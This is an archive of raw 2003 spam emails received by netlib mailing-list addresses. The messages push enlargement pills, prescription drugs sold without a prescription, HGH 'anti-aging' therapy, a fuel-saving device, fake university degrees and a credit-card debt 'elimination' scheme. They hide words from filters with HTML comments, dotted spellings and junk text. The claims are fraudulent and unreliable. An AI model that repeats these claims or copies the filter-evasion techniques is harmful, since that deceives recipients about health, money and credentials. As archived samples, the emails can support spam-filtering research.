Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<body link=3D"#FFFFFF"><!roughcast>
<table width=3D"75%" align=3Dcenter bgcolor=3D"#ABADBA"><tr><td>
<h3 style=3D"color: yellow; background: 0D1538; font: bold 14pt arial, san=
s; text-align: center; padding: 5px;">NATUR<!darlene>OMAX PI<!cigarette>LL=
S will actu<!strike>ally EXPA<!blunt>ND, LENGTHEN<br>and ENL<!sunset>ARGE =
your PE<!centroid>NIS</h3>

<ul>
        <li>
        <font face=3D"Arial, Helvetica, sans-serif" color=3D"#CC3300" styl=
e=3D"font-size: 13pt">
        Do you <b>WA<!camellia>NT</b> a <b>LAR<!constitutive>GER</b> pen<!=
calculable>is?</font></li>
        <li>
        <font face=3D"Arial, Helvetica, sans-serif" color=3D"#CC3300" styl=
e=3D"font-size: 13pt">
        Do you <b>WA<!emcee>NT</b> to give your par<!tortoise>tner <b>M<!a=
lways>ORE</b> plea<!electra>sure?</font></li>
        <li>
        <font face=3D"Arial, Helvetica, sans-serif" color=3D"#CC3300" styl=
e=3D"font-size: 13pt">
        Do you <b>WA<!collier>NT</b> to stay <b>RO<!poultry>CK HARD, LON<!=
caloric>GER</b>?</font></li>
        <li>
        <font face=3D"Arial, Helvetica, sans-serif" color=3D"#CC3300" styl=
e=3D"font-size: 13pt">
        Do you <b>WA<!vocabularian>NT</b> to <b>STOP PREM<!question>ATURE =
EJACU<!bradshaw>LATIONS</b>?</font></li>
        <li>
        <font face=3D"Arial, Helvetica, sans-serif" color=3D"#CC3300" styl=
e=3D"font-size: 13pt">
        Do you <b>WA<!arson>NT</b> to finally have a&nbsp; <b>BETT<!nichol=
s>ER SELF-IMAGE </b>as a
        <b>MAN</b>?</font></li>
        <li>
        <font face=3D"Arial, Helvetica, sans-serif" color=3D"#CC3300" styl=
e=3D"font-size: 13pt">
        Do you <b>WANT</b> to finally <b>ENJO<!codicil>Y LIFE</b>? </font>=
</li>
      </ul>

<h3 style=3D"color: yellow; background: 0D1538; font: bold 14pt arial, san=
s; text-align: center; padding: 5px;">100% SATISFACTION GARANTEED or your =
MONEY BACK<br>
<a href=3D"http://www.easynatural.com/cgi-bin/clickthru.cgi?id=3Dbiggest">=
Cl<!bald>ick Her<!pour>e for More on Na<!fernando>turoMax</a>
</h3>

<b><font face=3D"Verdana, Arial, Helvetica, sans-serif" style=3D"font-size=
: 13pt">Natu<!mossy>romax Doct<!mandarin>or App<!slight>roved PIL<!stoic>L=
S DO ALL THAT and even MO<!insane>RE!</font></b><p>

<h3 style=3D"color: yellow; background: 0D1538; font: bold 14pt arial, san=
s; text-align: center; padding: 5px;">
<DIV align=3Dcenter><b><EM>
<font size=3D"4" color=3D"#ffff00">NO </font><font size=3D"4"><font
color=3D"#FFFFFF">Surgery !</font>&nbsp;&nbsp;
<FONT color=3D#ffff00>NO </FONT><font color=3D"#FFFFFF">Exercises !</font>=
&nbsp;&nbsp;
<FONT color=3D#ffff00>NO </FONT><font color=3D"#FFFFFF">Pumps !</font>&nbs=
p;&nbsp;
<FONT color=3D#ffff00>NO </FONT><font color=3D"#FFFFFF">Painf<!contextual>=
ul Stretching !</font></font></EM></b><p>
<a href=3D"http://www.easynatural.com/cgi-bin/clickthru.cgi?id=3Dbiggest">=
<font size=3D5>Ord<!corpsmen>er NO<!also>W</font></a>
</DIV>
</h3>

</td></tr></table>
</body>
</html>bvjdh im ocvnxnm mu
 w qc zjyguokuyvcjznnpetcdmmkh
cwkjnzqlp
jqfsqwwjm
uat
x
 zrv  ds
t
m
am

--AC6A_ACBA_24_C5DB6EA3C..--


From doc_56cvypfnu@anfmail.com Fri Nov 14 02:08:26 2003
Return-Path: <doc_56cvypfnu@anfmail.com>
Received: from blast-funct-archive (host-132.YASEN.SG.02-1000.macomnet.net [213.247.192.132] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAE78NRY003448
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 14 Nov 2003 02:08:24 -0500 (EST)
Message-ID: <qvtqvvnxt.25582659abcxcertdf@Rabbitrauclh>
From: "Rabbit" <doc_56cvypfnu@anfmail.com>
Date: Fri, 14 Nov 2003 10:06:22 -0100
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Check out this dermal patch,       ixdpm
MIME-Version: 1.0
Content-type: text/html

<HTML>
<BODY>
<center><table><tr><td><a hrefeufmluhref=lslzj href="http://gcblicwh.plusherbal.biz/patch/?jwddumu"><IMG SRC="http://213.4.130.210/personal7/bolik15/patch/enp2_01.gif" border=0><br>
<IMG SRC="http://213.4.130.210/personal7/bolik15/patch/enp2_02.jpg" border=0><IMG SRC="http://213.4.130.210/personal7/bolik15/patch/enp2_03.gif" border=0><br>
<IMG SRC="http://213.4.130.210/personal7/bolik15/patch/enp2_04.gif" border=0><IMG SRC="http://213.4.130.210/personal7/bolik15/patch/enp2_05.gif" border=0><br>
<IMG SRC="http://213.4.130.210/personal7/bolik15/patch/enp2_06.gif" border=0><IMG SRC="http://213.4.130.210/personal7/bolik15/patch/enp2_07.gif" border=0><p></a>
<br><br><br><br><br><center>
<a hrefwutjfkylilhref=gxrqrk href="http://wpzizonbz.plusherbal.biz/o.html?sohjevljfd"><IMG SRC="http://213.4.130.210/personal7/bolik15/patch/o2.gif" border=0></a></td></tr></table>
<p><br>
jcddzdvsu  ,  criufu  , qyozxshzfq
</BODY>
</HTML>



From jsbx91d@yahoo.com Fri Nov 14 10:56:25 2003
Return-Path: <jsbx91d@yahoo.com>
Received: from 242855hfc11.tampabay.rr.com (242855hfc11.tampabay.rr.com [24.28.55.11])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAEFu8RY018014;
	Fri, 14 Nov 2003 10:56:12 -0500 (EST)
Received: from (HELO 594z) [96.251.13.230]
	by 242855hfc11.tampabay.rr.com SMTP id 0UiGT4hFSCk8gz;
	Fri, 14 Nov 2003 15:48:36 +0000
Message-ID: <96$klkykb0$84@wto79.d.q.6mbx>
From: "Will Snider" <jsbx91d@yahoo.com>
Reply-To: "Will Snider" <jsbx91d@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>
Subject: Blast-funct-archive Best of 2003. rmrmv
Date: Fri, 14 Nov 03 15:48:36 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".DDE7_7_CD8.C6389_DB_6F2"
X-Priority: 3
X-MSMail-Priority: Normal


--.DDE7_7_CD8.C6389_DB_6F2
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD>
</HEAD>
<DIV><FONT face=3DArial size=3D2>
<P align=3D"center"><B><FONT size=3D4>New Mini Remote Control Cars &amp; 

Boats.</FONT></B></P>
<p align=3D"center"><IMG 
height=3D104 alt=3D"" src=3D"http://www.onii.org/images/home/stunt_flip.gi=
f" 
width=3D121><A href=3D"http://www.mini-remote-cars-boats.com/?axel=3D36">F=
ollow Us For 
Fun...</A><BR>
<P align=3D"center"><B>Turbo Twister Mini RC</B> stunt cars are the newest=
 RC stunt cars 

in the 
world!&nbsp;<BR>These 2 1/2 inch stunt cars rotate, flip, and tumble 
everywhere!</P>
<p align=3D"center"><IMG height=3D119 alt=3D"" 
src=3D"http://www.onii.org/images/home/car_purple.jpg" width=3D150><A 
href=3D"http://www.mini-remote-cars-boats.com/?axel=3D36">Follow Us For 
Fun...</A><BR>
<P align=3D"center"><B>Honda S2000 (yellow)</B> - fully functional wireles=
s remote 

control 
(Radio-frequency)</P>
<p align=3D"center"><IMG height=3D90 alt=3D"" 
src=3D"http://www.onii.org/images/home/boat_yellow.jpg" width=3D144>&nbsp;=
&nbsp; <A 
href=3D"http://www.mini-remote-cars-boats.com/?axel=3D36">Follow Us For 
Fun...</A><BR>
<P align=3D"center"><B>Mini RC Ocean Runner Boat (yellow)</B> - Fully func=
tional remote 

control 
boat with 6 way remote control.</P>
<p align=3D"center"><BR><BR><BR><BR><A 
href=3D"http://www.aqmp.net/out5s/rem2e.asp">No more ad's</A> 
<BR><BR><BR><BR></FONT></DIV></HTML>ltlpwo nbqkvxzu 

--.DDE7_7_CD8.C6389_DB_6F2--


From b028wbmun@yahoo.com Fri Nov 14 18:14:18 2003
Return-Path: <b028wbmun@yahoo.com>
Received: from h00402b3cbdc7.ne.client2.attbi.com (h00402b3cbdc7.ne.client2.attbi.com [66.30.130.194])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAENEHRY027820;
	Fri, 14 Nov 2003 18:14:17 -0500 (EST)
Received: from [150.2.138.53]
	by h00402b3cbdc7.ne.client2.attbi.com SMTP id 7tWeWDYc37FqT5;
	Fri, 14 Nov 2003 19:18:58 -0100
Message-ID: <r89$qu-28$6hf@2mrmdqke>
From: "Dena Land" <b028wbmun@yahoo.com>
Reply-To: "Dena Land" <b028wbmun@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: RE:Soma.a Ambien.nn Valium.m Xanax.x  sozr j muyo 
Date: Fri, 14 Nov 03 19:18:58 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="._E__C4__B_.94_17.6F9.A"
X-Priority: 3
X-MSMail-Priority: Normal


--._E__C4__B_.94_17.6F9.A
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Hard to find Medzzz

No hidd.en char.ges - Fast Delivery

Vic.odin Val.ium Xan.ax

Via.gra Diaz.epam Alpra.zolam

So.ma Fior.icet Amb.ien 

Stil.nox Ult.ram Zo.loft 

Clon.azepam At.ivan Tr.amadol 

Xeni.cal Cele.brex Vi.oxx 

Pro.zac Bus.par Much M.ore....

http://www.health-products2003.com/index.php?KBID=3D1008






notinterested
http://www.health-products2003.com/r

mkokur rj
svbuhlsbfvsep ms ankdiupqvzqvcvxuxpd oz
qzs

--._E__C4__B_.94_17.6F9.A--


From 510thosq@yahoo.com Fri Nov 14 19:37:20 2003
Return-Path: <510thosq@yahoo.com>
Received: from oh-lyndhurst3c-59.clvhoh.adelphia.net (|solja|-4299@oh-lyndhurst3c-59.clvhoh.adelphia.net [68.70.181.59])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAF0bIRY028921
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 14 Nov 2003 19:37:19 -0500 (EST)
Received: from (HELO ytbv) [112.170.101.163] by oh-lyndhurst3c-59.clvhoh.adelphia.net SMTP id Io2k43w9xtVzrt for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 15 Nov 2003 01:29:12 +0100
Message-ID: <2bb-x16xsys-u-i2-889m2@vullj.78ik>
From: "Tricia Reeder" <510thosq@yahoo.com>
Reply-To: "Tricia Reeder" <510thosq@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Remote-Control Cars and Boats - Great Xmas Gifts.....bruno
Date: Sat, 15 Nov 2003 01:29:12 +0100
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="AB62E_27CC.9._8B"
X-Priority: 3


--AB62E_27CC.9._8B
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<p>New Mini Remote Control Cars &amp; Boats.</p>
<IMG SRC=3D"http://www.onii.org/images/home/stunt_flip.gif" ALT=3D""><a hr=
ef=3D"http://www.rc-cars-boats2003.com/?axel=3D49">Follow Us For Fun...</a=
><br>
<p>Turbo Twister Mini RC stunt cars are the newest RC stunt cars in 
the world! These 2 1/2 inch stunt cars rotate, flip, and tumble everywhere=
!</p>
<IMG SRC=3D"http://www.onii.org/images/home/car_purple.jpg" ALT=3D""><a hr=
ef=3D"http://www.rc-cars-boats2003.com/?axel=3D49">Follow Us For Fun...</a=
><br>
<p>Honda S2000 (yellow) - fully functional wireless remote control (Radio-=
frequency)</p>
<IMG SRC=3D"http://www.onii.org/images/home/boat_yellow.jpg" ALT=3D""><a h=
ref=3D"http://www.rc-cars-boats2003.com/?axel=3D49">Follow Us For Fun...</=
a><br>
<p>Mini RC Ocean Runner Boat (yellow) - Fully functional remote control bo=
at with 6 way remote control.</p>
<br>
<br>
<br>
<br>
<a href=3D"http://www.aqmp.net/out5s/rem2e.asp">No more advertisements</a>=
</p>
<br>
<br>
<br>
<br>ttuinixksgzl vg

--AB62E_27CC.9._8B--


From 366tluxfv@yahoo.com Fri Nov 14 20:00:07 2003
Return-Path: <366tluxfv@yahoo.com>
Received: from pcp03275536pcs.pthurn01.mi.comcast.net (pcp03275536pcs.pthurn01.mi.comcast.net [68.61.8.39])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAF106RY029126
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 14 Nov 2003 20:00:06 -0500 (EST)
Received: from [234.232.136.241] by pcp03275536pcs.pthurn01.mi.comcast.net SMTP id 6zChKE111pugXE; Sat, 15 Nov 2003 05:57:03 +0500
Message-ID: <3$d3$4rg4-$6iglw72bi5f-5j5-r8@f5ttjx.f2v6>
From: "Jean Holmes" <366tluxfv@yahoo.com>
Reply-To: "Jean Holmes" <366tluxfv@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Boost Your  Car's Gas Mileage 27%+.....byron
Date: Sat, 15 Nov 2003 05:57:03 +0500
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="3E1E73D524EE_5..E.58"
X-Priority: 3


--3E1E73D524EE_5..E.58
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

FUEL SAVER PRO

This revolutionary device Boosts Gas Mileage 27%+ by helping fuel burn bet=
ter using three patented processes from General Motors.

Take a test drive Today - http://www.zppi.org/?axel=3D49

PROVEN TECHNOLOGY
A certified U.S. Environmental Protection Agency (EPA) laboratory recently=
 completed tests on the new Fuel Saver. The results were astounding! Maste=
r Service, a subsidiary of Ford Motor Company, also conducted extensive em=
issions testing and obtained similar, unheard of results. The achievements=
 of the Fuel Saver is so noteworthy to the environmental community, that C=
ommercial News has featured it as their cover story in their June, 2000 ed=
ition.

Take a test drive Today - http://www.zppi.org/?axel=3D49






No more advertisements, thanks - http://www.aqmp.net/out5s/rem2e.asp































uikfyek dfy uzn j bwvuudu

--3E1E73D524EE_5..E.58--


From izknyef2d@yahoo.com Fri Nov 14 21:41:23 2003
Return-Path: <izknyef2d@yahoo.com>
Received: from 24-151-248-254.chartertn.net (24-151-248-254.chartertn.net [24.151.248.254])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAF2fDRY000659
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 14 Nov 2003 21:41:16 -0500 (EST)
Received: from (HELO j27m) [181.243.165.51] by 24-151-248-254.chartertn.net with ESMTP id F7EBAB1FB9B; Sat, 15 Nov 2003 02:38:27 +0000
Message-ID: <b985gp2k$$b4@p26izhl>
From: "Alice Lunsford" <izknyef2d@yahoo.com>
Reply-To: "Alice Lunsford" <izknyef2d@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: SUPER twice as fast.  o
Date: Sat, 15 Nov 03 02:38:27 GMT
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="9.A809FCB5BBB__9E8A8DD"
X-Priority: 3
X-MSMail-Priority: Normal


--9.A809FCB5BBB__9E8A8DD
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

1. Super Vi.agra The Weekend Pill,  Lots mo.re below

Cialis (Tadalafil) is known as Super Vi.agra
because it acts quicker and lasts much longer

Benefits from ordering your prescriptions from us are: 

No appointment 

No embarrassment 

No waiting rooms 

Confidential 

SSL Secure Ordering 
..All from the comfort of your home or office. 

Super Vi.agra
http://www.pills4lezz.com/c/index.php?AFF_ID=3Dr2d2



2. GENERIC VIA.GRA
http://www.cheaperthanever.com/g/index.php?AFF_ID=3Dr2d2


3. Male enlargement VP-RX PILLS
http://www.findpilzhere.com/v2/index.php?AFF_ID=3Dr2d2


4. VP-RX OIL
http://www.savebigdollars.net/x/index.php?AFF_ID=3Dr2d2









No
http://www.savebigdollars.net/o/




ibdspmgen
dtagkmqapyamxcqdrglmiqcsdnebyk 
 

--9.A809FCB5BBB__9E8A8DD--


From flti293@yahoo.com Fri Nov 14 22:14:01 2003
Return-Path: <flti293@yahoo.com>
Received: from dhcp065-024-027-219.columbus.rr.com (dhcp065-024-027-219.columbus.rr.com [65.24.27.219])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAF3DxRY001200
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 14 Nov 2003 22:13:59 -0500 (EST)
Received: from [89.103.99.180]
	by dhcp065-024-027-219.columbus.rr.com;
	Sat, 15 Nov 2003 03:02:55 -0100
Message-ID: <z-ynm38p052ke6xeqcj7-e6w9$uj-t@5ng11p8qly>
From: "Danial Christopher" <flti293@yahoo.com>
Reply-To: "Danial Christopher" <flti293@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: FWD:Xenical.l Valium.m Xanax.x Vicodin.n pi ljnacbynyse
Date: Sat, 15 Nov 03 03:02:55 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="63.C_1BB_5"
X-Priority: 3
X-MSMail-Priority: Normal


--63.C_1BB_5
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

THE RE.AL THING
not like the other sites that 
imitate these products.

No hidd.en char.ges - Fast Delivery

Specials running this week

Vic.odin Val.ium Xan.ax

Via.gra Diaz.epam Alpra.zolam

So.ma Fior.icet Amb.ien

Stil.nox Ult.ram Zo.loft

Clon.azepam At.ivan Tr.amadol

Xeni.cal Cele.brex Vi.oxx

Pro.zac Bus.par Much M.ore....

http://www.betterthis.biz/l/110/index.htm






If you have recieved this in error
please use
http://www.betterthis.biz/optout.html





lqmopshpbdlbezrybdfnaaez
fglgezrcbms  p 
igoejvk ivyjzdvn
yddb ryxima ak jpgjul  grouljb ykqa

--63.C_1BB_5--


From k8llie@yahoo.com Sat Nov 15 14:22:00 2003
Return-Path: <k8llie@yahoo.com>
Received: from 152.154.33.65.cfl.rr.com (152.154.33.65.cfl.rr.com [65.33.154.152])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAFJLoRY019627;
	Sat, 15 Nov 2003 14:21:54 -0500 (EST)
Received: from [249.33.196.197] by 152.154.33.65.cfl.rr.com SMTP id X1eM7lZau9DLt3; Sat, 15 Nov 2003 13:29:41 -0300
Message-ID: <24ar9d6f03$2m96s69392f$zidfzh4p@25i2at48nce>
From: "Kareem Mack" <k8llie@yahoo.com>
Reply-To: "Kareem Mack" <k8llie@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Soma.a Xanax.x Valium.m Vicodin.n vwmruqp t v kgkcybu
Date: Sat, 15 Nov 03 13:29:41 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_BF.0E_E5_B.5.7D1B1C16"
X-Priority: 3
X-MSMail-Priority: Normal


--_BF.0E_E5_B.5.7D1B1C16
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Hard to find Medzzz

No hidd.en char.ges - Fast Delivery

Vic.odin Val.ium Xan.ax

Via.gra Diaz.epam Alpra.zolam

So.ma Fior.icet Amb.ien 

Stil.nox Ult.ram Zo.loft 

Clon.azepam At.ivan Tr.amadol 

Xeni.cal Cele.brex Vi.oxx 

Pro.zac Bus.par Much M.ore....

http://www.health-products2003.com/index.php?KBID=3D1008






notinterested
http://www.health-products2003.com/r

n unz im

--_BF.0E_E5_B.5.7D1B1C16--


From b614odk@yahoo.com Sat Nov 15 15:17:25 2003
Return-Path: <b614odk@yahoo.com>
Received: from pe97031221.user.veloxzone.com.br (PE97031221.user.veloxzone.com.br [200.97.31.221] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAFKHFRY020769
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 15 Nov 2003 15:17:20 -0500 (EST)
Message-ID: <94r1ny$8ac4v8v3ut-048p3b276enmb@g68en>
From: "Roxanne Armstrong" <b614odk@yahoo.com>
Reply-To: "Roxanne Armstrong" <b614odk@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: LIVE LONGER with H-uman...G-rowth...H-ormone...kana
Date: Fri, 14 Nov 2003 22:06:33 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="B.2.3FC_AD5B.BC0B"


--B.2.3FC_AD5B.BC0B
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

H-uman...G-rowth...H-ormone Therapy

"Overall deterioration of the body that comes with growing old is not inev=
itable."---Dr. Daniel Rudman's in the New England Journal of Medicine.


Follow me to longer living: http://www.mmv9.org?affil=3D49


Scientific research and evidence overwhelmingly demonstrates that, in addi=
tion to genetic and environmental factors, our body's reduced production o=
f H-uman...G-rowth...H-ormone is a direct cause of aging. Between the ages=
 of 20 to 70, our levels can fall by more than 75%. This may cause us to l=
ook and feel older and less energetic. By the time most of us have reached=
 our forties, we are already experiencing a H-uman...G-rowth...H-ormone de=
ficiency.


Follow me to longer living: http://www.mmv9.org?affil=3D49


Our competitors charge as high as 65 dollars---get ours for less than 50.


Follow me to longer living: http://www.mmv9.org?affil=3D49









No more advertisements, thanks - http://www.aqmp.net/out5s/rem2e.asp




























rwmkpujoe hzwyfinyyn
pgyobzpmf 

--B.2.3FC_AD5B.BC0B--


From h310vk@yahoo.com Sat Nov 15 17:43:05 2003
Return-Path: <h310vk@yahoo.com>
Received: from ip-wv-68-113-137-168.charterwv.net (ip-wv-68-113-137-168.charterwv.net [68.113.137.168])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAFMh3RY023470
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 15 Nov 2003 17:43:03 -0500 (EST)
Received: from [160.168.188.161] by ip-wv-68-113-137-168.charterwv.net id <3212109-62229>; Sat, 15 Nov 2003 20:42:03 -0200
Message-ID: <s1z-mt916-$-tx0-41n251a@0cp.62p8ub>
From: "Estela Murray" <h310vk@yahoo.com>
Reply-To: "Estela Murray" <h310vk@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Bachelor's Diploma, Master's, or PhD - No Classes Necessary...dori
Date: Sat, 15 Nov 2003 20:42:03 -0200
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="28E.50_F..5.D3_.5C.F"
X-Priority: 3


--28E.50_F..5.D3_.5C.F
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Academic Qualifications available from prestigious NON=96ACCREDITTED unive=
rsities.

Do you have the knowledge and the experience but lack the qualifications?

Are you getting turned down time and time again for the job of your dreams=
 because you just don't have the right letters after your name?

Get the prestige that you deserve today!

Move ahead in your career today!

Bachelors, Masters and PhD's available in your field!

No examinations! No classes! No textbooks!


Call to register and receive your qualifications within days!

24 hours a day 7 days a week!




203-286-2187 - USA






No more, thanks: http://44rr5f.com


































































































op tvldx gd qc
i q cg a qhb
vghmnq sniqbgzzbqc pnjxceawuvb n   xlancml y

--28E.50_F..5.D3_.5C.F--


From ai09vpn@aol.com Sat Nov 15 19:16:12 2003
Return-Path: <ai09vpn@aol.com>
Received: from public1-cosh4-3-cust224.cosh.broadband.ntl.com (public1-cosh4-3-cust224.cosh.broadband.ntl.com [80.0.105.224])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAG0G9RY024385;
	Sat, 15 Nov 2003 19:16:10 -0500 (EST)
Received: from (HELO vphw) [99.65.26.91] by public1-cosh4-3-cust224.cosh.broadband.ntl.com; Sun, 16 Nov 2003 03:14:08 +0300
Message-ID: <i1q0$r--$4johj549$y5e0@941.qvyixv49>
From: "Bridgett Parr" <ai09vpn@aol.com>
Reply-To: "Bridgett Parr" <ai09vpn@aol.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Account Terminated
Date: Sun, 16 Nov 03 03:14:08 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="0_CE4.68_3_734D_EE2A"
X-Priority: 3
X-MSMail-Priority: Normal


--0_CE4.68_3_734D_EE2A
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><body><table align=3D"center"><tr><td><table width=3D"475" border=3D=
"0" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"#e6e6e6"><tr><td ><cen=
ter><font size=3D"+2"><b><font face=3D"Arial"><font color=3D"blue">ELIMI<!=
ckultu>NATE YOUR CRE<!b  smjqz
zrlc jastla sgt a
 hl mw bsewq 
owpa n mcoft>DIT CA<!xraacyl
srhb sauj gyfzgxcz pz m uakc few q zzdi   gmtfpvgcgch ca jahxcvm 
baceisb>RD DEBT <em>=
<u>WITHOUT BAN<!kpszaqcphvie zfcnjlci u
 iomteakz rrw zrdtzzfzlr>KRUP<!ti vxylmlunfyqczjzdi  ykstewafzuc>TCY!</u></em></font></b><b=
r><br><font size=3D"+1"><strong>Tired of making minimum pa<!bdcqss
dhnxrabzfug yosw

k cr hbat n fpgp>y=
m<!rhvzprshv lw koo  cesqaru jpn yyniyorc
a lui nwp
dlivl>ents and barely getting by?</strong><br><br>This is NOT co=
ns<!ux li k
ehjmdipb tasylcckjiqh
iailyt  

win glvysrvqvpr r>oli<!hq ml vmvgxj rso  zxngzwqnhzh k guajyhjq
xihfb tzz >dation or negotiation...<br><br><strong=
>This is COMP<!fyd ryit
 xbszvy apwp e
rrsdwuodmvtbwyq nopo >LETE DE<!asymedhkimskjl 
rkkfuqr uf oqxzhfi qe sg sqc d s yrwlh  >B<!rarupc 
fl ldi cc b cszhgvyecetqgmktdwocwxljnkifnel  l
ko krlyi
in uaotys ory x>T ELIMIN=
ATION</strong><br><br><font color=3D"red"><font size=3D"+2"><strong>ST<!=
olwwzetquzifbnonntyy
ws ziugqqg  t
cjeswk
rs ebdw
n a>OP MAKING PA<!nxxyocohmfsd
ztg >YME<!erzrdvzwrhnqa 
eh tby qrsl
d kjmwdwvuzzn jozx  ipmacgtmghl ccfaj i>NTS IMMEDIATELY!=
</strong><br></td></tr></table><table width=3D"475" border=3D"0" cellspaci=
ng=3D"0" cellpadding=3D"10" bgcolor=3D"#ffcccd"><tr><td ><center><font siz=
e=3D"+1"><font face=3D"Arial"><strong>Are you drowning in debt?</strong><b=
r><br>Here's what we can do for YOU...<br><table  width=3D"397" border=3D"=
0" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"#ffcccd"><tr><td ><ol><=
li>Terminate your credit card debt!<li>Allow you to stop making payments i=
mmediately!<li>Obtain a ZERO BALANCE statement from your creditors!</ol></=
td></tr></table>Unlike bankrup<!qodntk
vm
bsmi>tcy, this is <strong>COMPLETE=
LY PRIVATE</strong> and will<br><strong>NOT DAMAGE YOUR CREDIT REPORT!</st=
rong><br></td></tr></table><table  width=3D"475" border=3D"0"
cellspacing=3D=
"0" cellpadding=3D"10" bgcolor=3D"#e6e6e6"><tr><td ><center><font size=3D"=
+1"><font face=3D"Arial">You will <b>NOT</b> lose your home or any other a=
ssets!<br><br><div align=3D"center">
<a href=3D"http://www.terra.es/personal5/la64ks5/3k/" target=3D"_blank"><s=
trong>Request your FR<!hvivq 
ke
   

 pjc  j >EE CONSULTA<!lj zwaf rhrbylx zq
k cmrot
zym
sgmdaqiwfwj sfldtuj zkumawfbx
um mdk>TION now</st=
rong></a></div></td></tr></table><br><br><br><br><br><br><br><br><br><br><=
br><table width=3D"500" border=3D"0" cellspacing=3D"0" cellpadding=3D"10" =
bgcolor=3D"white"><tr><td ><center><font size=3D"-1">Please 
<a href=3D"http://www.terra.es/personal5/la64ks5/3k/" target=3D"_blank"><b=
>end</b></a> future announcements</font></td></tr></table></td></tr></tabl=
e><br><br><br></body></html>xghzzl  
nn faejjylvl qpkalpkkx tjukddqcse

--0_CE4.68_3_734D_EE2A--


From dbgcq29nr@biwako.or.jp Sun Nov 16 04:58:52 2003
Return-Path: <dbgcq29nr@biwako.or.jp>
Received: from 12-230-11-63.client.attbi.com (Eshaun@12-230-11-63.client.attbi.com [12.230.11.63])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAG9wWRY004854;
	Sun, 16 Nov 2003 04:58:39 -0500 (EST)
Received: from [77.35.166.208] by 12-230-11-63.client.attbi.com with ESMTP id 26101315; Sun, 16 Nov 2003 09:51:22 +0000
Message-ID: <f1c27$v$iz-xn@098.kj>
From: "Jacob Proctor" <dbgcq29nr@biwako.or.jp>
Reply-To: "Jacob Proctor" <dbgcq29nr@biwako.or.jp>
To: <blast-comm-archive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>, <netlibd@netlib2.cs.utk.edu>
Subject: THANK'S TO THE COMPUTER AGE AND THE INTERNET lysnq qyj   izmminzb
